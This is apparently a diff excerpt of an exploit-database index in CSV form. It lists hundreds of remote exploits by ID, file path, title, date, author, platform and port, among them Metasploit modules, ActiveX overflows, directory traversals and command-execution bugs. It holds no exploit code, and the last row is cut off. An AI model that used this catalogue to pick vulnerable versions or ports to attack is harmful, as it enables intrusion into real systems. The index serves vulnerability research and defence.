+10020,exploits/linux/remote/10020.rb,"Borland Interbase 2007/2007 SP2 - 'jrd8_create_database' Remote Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",remote,linux,3050 +10021,exploits/linux/remote/10021.rb,"Borland Interbase 2007/2007 SP2 - 'INET_connect' Remote Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",remote,linux,3050 +10023,exploits/linux/remote/10023.rb,"Salim Gasmi GLD (Greylisting Daemon) 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Metasploit)",2005-04-12,patrick,remote,linux,2525 +10024,exploits/linux/remote/10024.rb,"Madwifi < 0.9.2.1 - SIOCGIWSCAN Buffer Overflow (Metasploit)",2006-12-08,"Julien Tinnes",remote,linux, +10025,exploits/linux/remote/10025.rb,"University of Washington - imap LSUB Buffer Overflow (Metasploit)",2000-04-16,patrick,remote,linux,143 +10026,exploits/linux/remote/10026.rb,"Snort 2.4.0 < 2.4.3 - Back Orifice Pre-Preprocessor Remote (Metasploit)",2005-10-18,"KaiJern Lau",remote,linux,9080 +10027,exploits/linux/remote/10027.rb,"PeerCast 0.1216 - Remote Stack Overflow (Metasploit)",2006-03-08,MC,remote,linux,7144 +10028,exploits/cgi/remote/10028.rb,"Linksys WRT54G < 4.20.7 / WRT54GS < 1.05.2 - 'apply.cgi' Remote Buffer Overflow (Metasploit)",2005-09-13,"Raphael Rigo",remote,cgi,80 +10029,exploits/linux/remote/10029.rb,"Berlios GPSD 1.91-1 < 2.7-2 - Format String",2005-05-25,"Yann Senotier",remote,linux,2947 +10030,exploits/linux/remote/10030.rb,"DD-WRT HTTP v24-SP1 - Command Injection",2009-07-20,"H D Moore",remote,linux,80 +10032,exploits/linux/remote/10032.rb,"Unreal Tournament 2004 - 'Secure' Remote Overflow (Metasploit)",2004-07-18,onetwo,remote,linux,7787 +10033,exploits/irix/remote/10033.rb,"Irix LPD tagprinter - Command Execution (Metasploit)",2001-09-01,"H D Moore",remote,irix,515 +10034,exploits/hp-ux/remote/10034.rb,"HP-UX LPD 10.20/11.00/11.11 - Command Execution (Metasploit)",2002-08-28,"H D Moore",remote,hp-ux,515 +10035,exploits/bsd/remote/10035.rb,"Xtacacsd 4.1.2 - 'report()' Remote Buffer Overflow (Metasploit)",2008-01-08,MC,remote,bsd,49 +10036,exploits/solaris/remote/10036.rb,"System V Derived /bin/login - Extraneous Arguments Buffer Overflow (modem based) (Metasploit)",2001-12-12,I)ruid,remote,solaris, +10037,exploits/cgi/remote/10037.rb,"Mercantec SoftCart 4.00b - CGI Overflow (Metasploit)",2004-08-19,skape,remote,cgi, +10047,exploits/windows/remote/10047.txt,"Femitter HTTP Server 1.03 - Remote Source Disclosure",2009-10-12,Dr_IDE,remote,windows,80 +10053,exploits/windows/remote/10053.txt,"httpdx 1.4 - GET Buffer Overflow",2009-10-08,"Pankaj Kohli",remote,windows,80 +10054,exploits/windows/remote/10054.txt,"SAP GUI VSFlexGrid.VSFlexGridL sp 14 - Remote Buffer Overflow",2008-11-26,"Elazar Broad",remote,windows, +10055,exploits/hardware/remote/10055.txt,"HP Multiple LaserJet Printer - Cross-Site Scripting",2009-07-04,sh2kerr,remote,hardware,80 +10056,exploits/windows/remote/10056.py,"Ada Image Server 0.6.7 - 'imgsrv.exe' Remote Buffer Overflow",2009-10-07,blake,remote,windows,1235 +10070,exploits/windows/remote/10070.php,"IBM Informix Client SDK 3.0 - '.nfx' File Integer Overflow",2009-10-05,bruiser,remote,windows, +10071,exploits/multiple/remote/10071.txt,"Mozilla NSS - NULL Character CA SSL Certificate Validation Security Bypass",2009-11-10,"Dan Kaminsky",remote,multiple, +10079,exploits/windows/remote/10079.txt,"Google Apps - mailto URI handler cross-browser Remote command Execution",2009-10-01,pyrokinesis,remote,windows, +33431,exploits/windows/remote/33431.html,"AoA Audio Extractor Basic 2.3.7 - ActiveX",2014-05-19,metacom,remote,windows, +33432,exploits/windows/remote/33432.html,"AoA DVD Creator 2.6.2 - ActiveX",2014-05-19,metacom,remote,windows, +10081,exploits/hardware/remote/10081.txt,"Palm Pre WebOS 1.1 - Remote File Access",2009-10-05,"Townsend Ladd Harris",remote,hardware, +10083,exploits/php/remote/10083.txt,"PHP 5.3 - 'preg_match()' Full Path Disclosure",2009-09-27,"David Vieira-Kurz",remote,php, +10086,exploits/multiple/remote/10086.txt,"WebKit - 'Document()' Remote Information Disclosure",2009-11-12,"Chris Evans",remote,multiple, +10093,exploits/multiple/remote/10093.txt,"Adobe Shockwave Player 11.5.1.601 - Multiple Code Executions",2009-11-04,"Francis Provencher",remote,multiple, +10095,exploits/multiple/remote/10095.txt,"Samba 3.0.10 < 3.3.5 - Format String / Security Bypass",2009-11-13,"Jeremy Allison",remote,multiple, +10097,exploits/php/remote/10097.php,"PHP 5.2.11/5.3.0 - Multiple Vulnerabilities",2009-11-13,"Maksymilian Arciemowicz",remote,php, +10098,exploits/windows/remote/10098.py,"Novell eDirectory 8.8 SP5 - iConsole Buffer Overflow",2009-11-16,ryujin,remote,windows, +10099,exploits/windows/remote/10099.py,"Hewlett-Packard (HP) Power Manager Administration Power Manager Administration - Universal Buffer Overflow",2009-11-16,ryujin,remote,windows,80 +10162,exploits/windows/remote/10162.py,"Home FTP Server - 'MKD' Directory Traversal",2009-11-17,zhangmc,remote,windows,21 +10235,exploits/windows/remote/10235.py,"Eureka Email Client - Remote Buffer Overflow",2009-11-26,"Dr_IDE & dookie",remote,windows, +10258,exploits/windows/remote/10258.pl,"Golden FTP Server 4.30 - File Deletion",2009-12-01,sharpe,remote,windows,21 +10269,exploits/windows/remote/10269.html,"Haihaisoft Universal Player 1.4.8.0 - 'URL' Property ActiveX Buffer Overflow",2009-12-01,shinnai,remote,windows, +10282,exploits/linux/remote/10282.py,"OrzHTTPd - Format String",2009-12-03,"Patroklos Argyroudis",remote,linux,80 +10340,exploits/windows/remote/10340.pl,"Symantec (Multiple Products) - Intel Common Base Agent Remote Command Execution",2009-04-28,kingcope,remote,windows, +10362,exploits/hardware/remote/10362.txt,"THOMSON TG585n 7.4.3.2 - 'user.ini' Arbitrary Disclosure",2009-12-09,"AnTi SeCuRe",remote,hardware, +10365,exploits/windows/remote/10365.rb,"Eureka Email 2.2q - ERR Remote Buffer Overflow (Metasploit) (1)",2009-12-09,dookie,remote,windows, +10375,exploits/windows/remote/10375.html,"SAP GUI for Windows - 'sapirrfc.dll' ActiveX Overflow",2009-12-10,Abysssec,remote,windows, +10380,exploits/windows/remote/10380.pl,"Sunbird 0.9 - Array Overrun Code Execution",2009-12-11,"Maksymilian Arciemowicz & sp3x",remote,windows, +10394,exploits/windows/remote/10394.py,"HP OpenView Network Node Manager (OV NNM) 7.53 - 'ovalarm.exe' CGI Unauthenticated Remote Buffer Overflow",2009-12-12,"sinn3r & muts",remote,windows,80 +10434,exploits/windows/remote/10434.py,"Savant Web Server 3.1 - Remote Buffer Overflow (3)",2009-12-14,DouBle_Zer0,remote,windows,80 +10451,exploits/hardware/remote/10451.txt,"HMS HICP Protocol + Intellicom - 'NetBiterConfig.exe' Remote Buffer Overflow",2009-12-14,"Ruben Santamarta",remote,hardware, +10510,exploits/hardware/remote/10510.txt,"Cisco ASA 8.x - VPN SSL Module Clientless URL-list control Bypass",2009-12-17,"David Eduardo Acosta Rodriguez",remote,hardware, +10542,exploits/windows/remote/10542.py,"TFTP Server 1.4 - Remote Buffer Overflow (2)",2009-12-18,Molotov,remote,windows,69 +10579,exploits/multiple/remote/10579.py,"TLS - Renegotiation (PoC)",2009-12-21,"RedTeam Pentesting",remote,multiple, +10610,exploits/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 - 'CGI' Arbitrary Command Execution",2009-12-23,"Aaron Conole",remote,linux, +14257,exploits/windows/remote/14257.py,"Hero DVD Remote 1.0 - Remote Buffer Overflow",2010-07-07,chap0,remote,windows, +10715,exploits/windows/remote/10715.rb,"HP Application Recovery Manager - 'OmniInet.exe' Remote Buffer Overflow",2009-12-26,EgiX,remote,windows,5555 +10765,exploits/windows/remote/10765.py,"BigAnt Server 2.52 - Remote Overflow (SEH)",2009-12-29,Lincoln,remote,windows,6660 +10791,exploits/windows/remote/10791.py,"Microsoft IIS - ASP Multiple Extensions Security Bypass 5.x/6.x Vulnerabilities",2009-12-30,emgent,remote,windows,80 +10911,exploits/windows/remote/10911.py,"NetTransport Download Manager 2.90.510 - Remote Overflow (SEH)",2010-01-02,Lincoln,remote,windows, +10973,exploits/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow (2)",2010-01-03,DouBle_Zer0,remote,windows, +10980,exploits/linux/remote/10980.txt,"Skype for Linux 2.1 Beta - Multiple Strange Behaviour Vulnerabilities",2010-01-04,emgent,remote,linux, +11022,exploits/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - Authenticated Remote Buffer Overflow",2010-01-06,"His0k4 & Simo36",remote,novell, +11027,exploits/windows/remote/11027.pl,"Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow (Perl)",2010-01-06,jacky,remote,windows, +11059,exploits/windows/remote/11059.html,"JcomBand toolbar on IE - ActiveX Buffer Overflow",2010-01-07,"germaya_x & D3V!L FUCKER",remote,windows, +11138,exploits/windows/remote/11138.c,"Apple iTunes 8.1.x - 'daap' Remote Buffer Overflow",2010-01-14,Simo36,remote,windows, +11151,exploits/windows/remote/11151.html,"Microsoft Internet Explorer - 'wshom.ocx' ActiveX Control Remote Code Execution",2010-01-16,"germaya_x & D3V!L FUCKER",remote,windows, +11167,exploits/windows/remote/11167.py,"Microsoft Internet Explorer 6 - Aurora",2010-01-17,"Ahmed Obied",remote,windows, +11172,exploits/windows/remote/11172.html,"Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Execution (PoC)",2010-01-17,superli,remote,windows, +11173,exploits/windows/remote/11173.txt,"Trend Micro Web-Deployment - ActiveX Remote Execution (PoC)",2010-01-17,superli,remote,windows, +11179,exploits/windows/remote/11179.rb,"EFS Software Easy Chat Server 2.2 - Remote Buffer Overflow",2010-01-18,"John Babio",remote,windows, +11203,exploits/multiple/remote/11203.py,"Pidgin MSN 2.6.4 - File Download",2010-01-19,"Mathieu GASPARD",remote,multiple, +11204,exploits/windows/remote/11204.html,"AOL 9.5 - ActiveX Heap Spray",2010-01-20,Dz_attacker,remote,windows, +11210,exploits/windows/remote/11210.rb,"EFS Easy Chat Server - Universal Buffer Overflow (SEH) (Metasploit)",2010-01-21,fb1h2s,remote,windows, +11220,exploits/windows/remote/11220.py,"IntelliTamper 2.07/2.08 - Remote Buffer Overflow (SEH)",2010-01-22,loneferret,remote,windows, +11257,exploits/windows/remote/11257.rb,"AOL 9.5 - Phobos.Playlist 'Import()' Remote Buffer Overflow (Metasploit)",2010-01-25,Trancer,remote,windows, +11272,exploits/windows/remote/11272.py,"CamShot 1.2 - Overwrite (SEH)",2010-01-27,tecnik,remote,windows, +11293,exploits/windows/remote/11293.py,"Vermillion FTP Deamon 1.31 - Remote Buffer Overflow",2010-01-30,Dz_attacker,remote,windows, +11328,exploits/windows/remote/11328.py,"UplusFTP Server 1.7.0.12 - Remote Buffer Overflow",2010-02-04,b0telh0,remote,windows, +11420,exploits/windows/remote/11420.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Remote Overflow",2010-02-12,Lincoln,remote,windows, +11422,exploits/windows/remote/11422.rb,"Hyleos ChemView 1.9.5.1 - ActiveX Control Buffer Overflow (Metasploit)",2010-02-12,Dz_attacker,remote,windows, +11453,exploits/windows/remote/11453.py,"Wireshark 1.2.5 - LWRES getaddrbyname Buffer Overflow",2010-02-15,"Nullthreat & Pure|Hate",remote,windows, +11457,exploits/windows/remote/11457.pl,"Microsoft Internet Explorer 6/7 - Remote Code Execution (Remote User Add)",2010-02-15,"Sioma Labs",remote,windows, +11468,exploits/windows/remote/11468.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (1)",2010-02-15,dookie,remote,windows,21 +11497,exploits/linux/remote/11497.txt,"gitWeb 1.5.2 - Remote Command Execution",2010-02-18,"S2 Crew",remote,linux, +11500,exploits/windows/remote/11500.py,"EasyFTP Server 1.7.0.2 - 'HTTP' Remote Buffer Overflow",2010-02-18,"ThE g0bL!N",remote,windows, +11539,exploits/windows/remote/11539.py,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow",2010-02-22,athleet,remote,windows, +11615,exploits/win_x86/remote/11615.txt,"Microsoft Internet Explorer 6/7/8 - 'winhlp32.exe MsgBox()' Remote Code Execution",2010-03-02,"Maurycy Prodeus",remote,win_x86, +11618,exploits/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Remote Buffer Overflow",2010-03-02,"S2 Crew",remote,windows, +11650,exploits/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM",2010-03-07,"Brett Gervasoni",remote,windows, +11661,exploits/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray",2010-03-09,"Alexey Sintsov",remote,windows, +11662,exploits/multiple/remote/11662.txt,"Apache SpamAssassin Milter Plugin 0.3.1 - Remote Command Execution",2010-03-09,kingcope,remote,multiple, +11668,exploits/windows/remote/11668.rb,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)",2010-03-09,blake,remote,windows, +11683,exploits/windows/remote/11683.rb,"Microsoft Internet Explorer - 'iepeers.dll' Use-After-Free (Metasploit)",2010-03-10,Trancer,remote,windows, +11694,exploits/windows/remote/11694.txt,"Skype - URI Handler Input Validation",2010-03-11,"Paul Craig",remote,windows, +11720,exploits/linux/remote/11720.py,"Microworld eScan AntiVirus < 3.x - Remote Code Execution",2010-03-13,"Mohammed almutairi",remote,linux, +11742,exploits/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Buffer Overflow (Metasploit)",2010-03-15,blake,remote,windows, +11750,exploits/windows/remote/11750.html,"Liquid XML Studio 2010 < 8.061970 - 'LtXmlComHelp8.dll OpenFile()' Remote Overflow",2010-03-15,mr_me,remote,windows, +11765,exploits/windows/remote/11765.txt,"ArGoSoft FTP Server .NET 1.0.2.1 - Directory Traversal",2010-03-15,dmnt,remote,windows,21 +11817,exploits/multiple/remote/11817.txt,"KDE 4.4.1 - Ksysguard Remote Code Execution (via Cross Application Scripting)",2010-03-20,emgent,remote,multiple, +11820,exploits/windows/remote/11820.pl,"eDisplay Personal FTP Server 1.0.0 - Authenticated Multiple Stack Buffer Overflows (1)",2010-03-20,corelanc0d3r,remote,windows, +11822,exploits/hardware/remote/11822.txt,"ZKSoftware Biometric Attendence Managnmnet Hardware[MIPS] 2 - Improper Authentication",2010-03-20,fb1h2s,remote,hardware, +11856,exploits/multiple/remote/11856.txt,"uhttp Server 0.1.0-alpha - Directory Traversal",2010-03-23,"Salvatore Fresta",remote,multiple, +11857,exploits/windows/remote/11857.c,"MX Simulator Server - Remote Buffer Overflow (PoC)",2010-03-23,"Salvatore Fresta",remote,windows, +11877,exploits/windows/remote/11877.py,"eDisplay Personal FTP Server 1.0.0 - Authenticated Multiple Stack Buffer Overflows (2)",2010-03-25,sud0,remote,windows,21 +11879,exploits/windows/remote/11879.txt,"SAP GUI 7.00 - BExGlobal Active-X unsecure method",2010-03-25,"Alexey Sintsov",remote,windows, +11886,exploits/windows/remote/11886.py,"SAP MaxDB - Malformed Handshake Request Remote Code Execution",2010-03-26,"S2 Crew",remote,windows, +11973,exploits/windows/remote/11973.txt,"CompleteFTP Server - Directory Traversal",2010-03-30,zombiefx,remote,windows, +11974,exploits/windows/remote/11974.py,"HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Topic Overflow",2010-03-30,"S2 Crew",remote,windows, +11986,exploits/linux/remote/11986.py,"OpenDcHub 0.8.1 - Remote Code Execution",2010-03-31,"Pierre Nogues",remote,linux, +12033,exploits/multiple/remote/12033.txt,"Java Mini Web Server 1.0 - Directory Traversal / Cross-Site Scripting",2010-04-03,cp77fk4r,remote,multiple, +12044,exploits/windows/remote/12044.c,"EasyFTP Server 1.7.0.2 - 'MKD' Authenticated Remote Buffer Overflow",2010-04-04,x90c,remote,windows, +12114,exploits/multiple/remote/12114.txt,"miniature java Web server 1.71 - Multiple Vulnerabilities",2010-04-08,cp77fk4r,remote,multiple, +12117,exploits/windows/remote/12117.txt,"Java Deployment Toolkit - Performs Insufficient Validation of Parameters",2010-04-09,"Tavis Ormandy",remote,windows, +12119,exploits/windows/remote/12119.pl,"Microsoft Windows FTP Server 1.4 - Authentication Bypass",2010-04-09,chap0,remote,windows, +12122,exploits/multiple/remote/12122.txt,"JAVA Web Start - Arbitrary Command-Line Injection",2010-04-09,"Ruben Santamarta",remote,multiple, +12152,exploits/windows/remote/12152.pl,"Trellian FTP Client - PASV Buffer Overflow",2010-04-11,zombiefx,remote,windows, +12156,exploits/windows/remote/12156.txt,"Microsoft Internet Explorer/Opera - Source Code viewer Null Character Handling",2010-04-11,"Daniel Correa",remote,windows, +12202,exploits/windows/remote/12202.html,"MagnetoSoft ICMP 4.0.0.18 - ActiveX AddDestinationEntry Buffer Overflow",2010-04-13,s4squatch,remote,windows, +12203,exploits/windows/remote/12203.html,"MagnetoSoft SNTP 4.0.0.7 - ActiveX SntpGetReply Buffer Overflow",2010-04-13,s4squatch,remote,windows, +12244,exploits/windows/remote/12244.txt,"iMesh 7.1.0.x - 'IMWeb.dll 7.0.0.x' Remote Heap Overflow",2007-12-18,rgod,remote,windows, +12247,exploits/windows/remote/12247.html,"Magneto Net Resource ActiveX 4.0.0.5 - 'NetFileClose' Universal",2010-04-15,dookie,remote,windows, +12248,exploits/windows/remote/12248.html,"Magneto Net Resource ActiveX 4.0.0.5 - 'NetConnectionEnum' Universal",2010-04-15,dookie,remote,windows, +12250,exploits/windows/remote/12250.html,"Magneto Net Resource ActiveX 4.0.0.5 - 'NetShareEnum' Universal",2010-04-15,dookie,remote,windows, +12263,exploits/multiple/remote/12263.txt,"Apache OFBiz - Remote Execution (via SQL Execution) (PoC)",2010-04-16,"Lucas Apa",remote,multiple, +12264,exploits/multiple/remote/12264.txt,"Apache OFBiz - Admin Creator (PoC)",2010-04-16,"Lucas Apa",remote,multiple, +12265,exploits/hardware/remote/12265.txt,"Iomega Home Media Network Hard Drive 2.038 < 2.061 - Unauthenticated File-system Access",2010-04-16,fizix610,remote,hardware, +12298,exploits/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,remote,hardware, +12304,exploits/multiple/remote/12304.txt,"Multi-Threaded HTTP Server 1.1 - Directory Traversal (1)",2010-04-20,chr1x,remote,multiple, +12308,exploits/windows/remote/12308.txt,"Multi-Threaded HTTP Server 1.1 - Source Disclosure",2010-04-20,Dr_IDE,remote,windows, +12309,exploits/windows/remote/12309.txt,"Mongoose Web Server 2.8 - Multiple Directory Traversals",2010-04-20,Dr_IDE,remote,windows, +12310,exploits/windows/remote/12310.txt,"Acritum Femitter 1.03 - Directory Traversal",2010-04-20,Dr_IDE,remote,windows, +12312,exploits/windows/remote/12312.rb,"EasyFTP Server 1.7.0.2 - CWD Buffer Overflow (Metasploit)",2010-04-20,"Paul Makowski",remote,windows, +12320,exploits/windows/remote/12320.txt,"Viscom Software Movie Player Pro SDK ActiveX 6.8 - Remote Buffer Overflow",2010-04-21,shinnai,remote,windows, +12331,exploits/windows/remote/12331.txt,"Multi-Threaded HTTP Server 1.1 - Directory Traversal (2)",2010-04-20,Dr_IDE,remote,windows, +12332,exploits/windows/remote/12332.pl,"Xftp client 3.0 - 'PWD' Remote Overflow",2010-04-22,zombiefx,remote,windows, +12343,exploits/multiple/remote/12343.txt,"Apache Tomcat 5.5.0 < 5.5.29 / 6.0.0 < 6.0.26 - Information Disclosure",2010-04-22,"Deniz Cevik",remote,multiple, +12367,exploits/windows/remote/12367.html,"HP Digital Imaging - 'hpodio08.dll' Insecure Method",2010-04-24,"ThE g0bL!N",remote,windows, +12380,exploits/windows/remote/12380.pl,"Rumba FTP Client 4.2 - PASV Buffer Overflow (SEH)",2010-04-25,zombiefx,remote,windows, +12417,exploits/windows/remote/12417.py,"Bigant Messenger 2.52 - 'AntCore.dll RegisterCom()' Remote Heap Overflow",2010-04-27,mr_me,remote,windows, +12480,exploits/windows/remote/12480.txt,"Acritum Femitter Server 1.03 - Multiple Vulnerabilities",2010-05-02,"Zer0 Thunder",remote,windows, +12495,exploits/windows/remote/12495.pl,"ProSSHD 1.2 - Authenticated Remote (ASLR + DEP Bypass)",2010-05-03,"Alexey Sintsov",remote,windows, +12498,exploits/windows/remote/12498.txt,"VicFTPS 5.0 - Directory Traversal",2010-05-04,chr1x,remote,windows, +12511,exploits/windows/remote/12511.txt,"MDaemon Mailer Daemon 11.0.1 - Remote File Disclosure",2010-05-05,kingcope,remote,windows, +12512,exploits/windows/remote/12512.py,"Ziepod+ 1.0 - CrossApplication Scripting",2010-05-05,sinn3r,remote,windows, +12573,exploits/windows/remote/12573.html,"Apple Safari 4.0.5 - 'parent.close()' Memory Corruption Code Execution",2010-05-11,"Krystian Kloskowski",remote,windows, +12580,exploits/windows/remote/12580.txt,"MiniWebsvr 0.0.10 - Directory Traversal / Listing",2010-05-12,Dr_IDE,remote,windows, +12581,exploits/windows/remote/12581.txt,"Zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,remote,windows, +12582,exploits/windows/remote/12582.txt,"Zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,remote,windows, +12587,exploits/linux/remote/12587.c,"WFTPD Server 3.30 - Multiple Vulnerabilities",2010-05-13,"fl0 fl0w",remote,linux,21 +12614,exploits/windows/remote/12614.txt,"Apple Safari 4.0.5 - 'parent.close()' Memory Corruption (ASLR + DEP Bypass)",2010-05-15,"Alexey Sintsov",remote,windows, +12657,exploits/windows/remote/12657.txt,"Google Chrome 4.1.249.1059 - Cross Origin Bypass in Google URL (GURL)",2010-05-19,"Jordi Chancel",remote,windows, +12663,exploits/windows/remote/12663.html,"CommuniCrypt Mail 1.16 - 'ANSMTP.dll/AOSMTP.dll' ActiveX",2010-05-19,Lincoln,remote,windows, +12673,exploits/windows/remote/12673.txt,"ComponentOne VSFlexGrid 7/8 - 'Archive()' method Remote Buffer Overflow",2010-05-20,Ma3sTr0-Dz,remote,windows, +14321,exploits/windows/remote/14321.html,"Image22 ActiveX 1.1.1 - Remote Buffer Overflow",2010-07-10,blake,remote,windows, +12804,exploits/multiple/remote/12804.txt,"Nginx 0.6.36 - Directory Traversal",2010-05-30,cp77fk4r,remote,multiple, +12815,exploits/windows/remote/12815.txt,"GoAheaad WebServer - Source Code Disclosure",2010-05-30,Sil3nt_Dre4m,remote,windows, +12834,exploits/windows/remote/12834.py,"XFTP 3.0 Build 0239 - 'Filename' Remote Buffer Overflow",2010-06-01,sinn3r,remote,windows, +12865,exploits/hardware/remote/12865.txt,"Motorola Surfboard Cable Modem - Directory Traversal",2010-06-03,"S2 Crew",remote,hardware, +40091,exploits/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload (Metasploit)",2016-07-11,"Mehmet Ince",remote,php,80 +13588,exploits/multiple/remote/13588.pl,"2^6 TCP Control Bit - Fuzzer (No ECN or CWR)",2010-01-11,ShadowHatesYou,remote,multiple, +13735,exploits/osx/remote/13735.py,"Apple Mac OSX EvoCam Web Server 3.6.6/3.6.7 - Remote Buffer Overflow",2010-06-05,d1dn0t,remote,osx,8080 +13787,exploits/multiple/remote/13787.txt,"Adobe Flash / Reader - Live Malware (PoC)",2010-06-09,anonymous,remote,multiple, +13808,exploits/windows/remote/13808.txt,"Microsoft Windows Help Centre Handles - Malformed Escape Sequences Incorrectly (MS03-044)",2010-06-10,"Tavis Ormandy",remote,windows, +13818,exploits/windows/remote/13818.txt,"Nginx 0.8.36 - Source Disclosure / Denial of Service",2010-06-11,Dr_IDE,remote,windows, +13822,exploits/windows/remote/13822.txt,"Nginx 0.7.65/0.8.39 (dev) - Source Disclosure / Download",2010-06-11,"Jose A. Vazquez",remote,windows, +13834,exploits/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP Bypass",2010-06-11,Lincoln,remote,windows, +13850,exploits/multiple/remote/13850.pl,"Litespeed Technologies - Web Server Remote Poison Null Byte",2010-06-13,kingcope,remote,multiple,80 +13853,exploits/linux/remote/13853.pl,"UnrealIRCd 3.2.8.1 - Remote Downloader/Execute",2010-06-13,anonymous,remote,linux, +13903,exploits/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - Remote Overflow (SEH)",2010-06-17,b0nd,remote,windows, +13932,exploits/windows/remote/13932.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Full System Access",2010-06-18,"Serge Gorbunov",remote,windows, +14360,exploits/multiple/remote/14360.txt,"Struts2/XWork < 2.2.0 - Remote Command Execution",2010-07-14,"Meder Kydyraliev",remote,multiple, +14013,exploits/windows/remote/14013.txt,"UFO: Alien Invasion 2.2.1 - Arbitrary Code Execution",2010-06-24,"Jason Geffner",remote,windows, +14091,exploits/osx/remote/14091.py,"UFO: Alien Invasion 2.2.1 (OSX) - Remote Code Execution",2010-06-28,dookie,remote,osx, +30100,exploits/windows/remote/30100.html,"British TeleCommunications Consumer Webhelper 2.0.0.7 - Multiple Buffer Overflow Vulnerabilities",2007-05-29,"Will Dormann",remote,windows, +14179,exploits/windows/remote/14179.txt,"Microsoft IIS 5.0 - Authentication Bypass (MS10-065)",2010-07-02,"Soroush Dalili",remote,windows, +14180,exploits/windows/remote/14180.py,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid MaxAge Remote Code Execution",2010-07-02,"S2 Crew",remote,windows,80 +14181,exploits/windows/remote/14181.py,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",remote,windows,80 +14182,exploits/windows/remote/14182.py,"HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid Hostname Remote Code Execution",2010-07-02,"S2 Crew",remote,windows,80 +14194,exploits/windows/remote/14194.cpp,"Sun Java Web Server 7.0 u7 - Remote Overflow",2010-07-03,dmc,remote,windows, +14195,exploits/windows/remote/14195.html,"SasCam WebCam Server 2.6.5 - ActiveX Overwrite (SEH)",2010-07-03,blake,remote,windows, +14200,exploits/windows/remote/14200.html,"Registry OCX 1.5 - ActiveX Buffer Overflow",2010-07-04,blake,remote,windows, +14222,exploits/windows/remote/14222.py,"UFO: Alien Invasion 2.2.1 (Windows 7) - Remote Buffer Overflow (ASLR + DEP Bypass)",2010-07-05,Node,remote,windows, +14248,exploits/windows/remote/14248.py,"minerCPP 0.4b - Remote Buffer Overflow / Format String",2010-07-06,l3D,remote,windows, +14254,exploits/osx/remote/14254.py,"Apple Mac OSX EvoCam Web Server (Snow Leopard) - ROP Remote Overflow",2010-07-06,d1dn0t,remote,osx, +14267,exploits/windows/remote/14267.txt,"EA Battlefield 2 / Battlefield 2142 - Multiple Arbitrary File Upload Vulnerabilities",2010-07-08,"Luigi Auriemma",remote,windows, +14269,exploits/windows/remote/14269.html,"FathFTP 1.7 - ActiveX Buffer Overflow",2010-07-08,blake,remote,windows, +14272,exploits/osx/remote/14272.py,"UFO: Alien Invasion 2.2.1 (OSX Snow Leopard) - IRC Client Remote Code Execution (ROP)",2010-07-08,d1dn0t,remote,osx, +14275,exploits/windows/remote/14275.txt,"Real Player 12.0.0.879 - Code Execution",2010-07-08,webDEViL,remote,windows, +14287,exploits/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Remote Overflow (DEP Bypass)",2010-07-09,dmc,remote,windows, +14309,exploits/windows/remote/14309.html,"RSP MP3 Player OCX 3.2 - ActiveX Buffer Overflow",2010-07-09,blake,remote,windows, +14385,exploits/windows/remote/14385.html,"Avant Browser 11.7 build 45 - Clickjacking",2010-07-17,"Pouya Daneshmand",remote,windows, +14386,exploits/multiple/remote/14386.html,"Opera Browser 10.60 - Clickjacking",2010-07-17,"Pouya Daneshmand",remote,multiple, +14387,exploits/multiple/remote/14387.html,"Apple Safari 4.0.2 - Clickjacking",2010-07-17,"Pouya Daneshmand",remote,multiple, +14388,exploits/multiple/remote/14388.html,"Netscape Browser 9.0.0.6 - Clickjacking",2010-07-17,"Pouya Daneshmand",remote,multiple, +14399,exploits/windows/remote/14399.py,"EasyFTP Server 1.7.0.11 - 'MKD' Authenticated Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",remote,windows, +14400,exploits/windows/remote/14400.py,"EasyFTP Server 1.7.0.11 - 'LIST' Authenticated Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",remote,windows, +14402,exploits/windows/remote/14402.py,"EasyFTP Server 1.7.0.11 - 'CWD' Authenticated Remote Buffer Overflow",2010-07-18,fdiskyou,remote,windows, +14407,exploits/aix/remote/14407.c,"rpc.pcnfsd - Remote Format String",2010-07-18,"Rodrigo Rubira Branco",remote,aix, +14409,exploits/aix/remote/14409.pl,"AIX5l with FTP-Server - Hash Disclosure",2010-07-18,kingcope,remote,aix, +14412,exploits/windows/remote/14412.rb,"Hero DVD - Remote Buffer Overflow (Metasploit)",2010-07-19,Madjix,remote,windows, +14416,exploits/windows/remote/14416.html,"SapGUI BI 7100.1.400.8 - Heap Corruption",2010-07-20,"Elazar Broad",remote,windows, +14447,exploits/windows/remote/14447.html,"Multiple Browsers (FF3.6.7/SM 2.0.6) - Clickjacking",2010-07-23,"Pouya Daneshmand",remote,windows, +14451,exploits/windows/remote/14451.rb,"EasyFTP Server 1.7.0.11 - 'LIST' Authenticated Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad 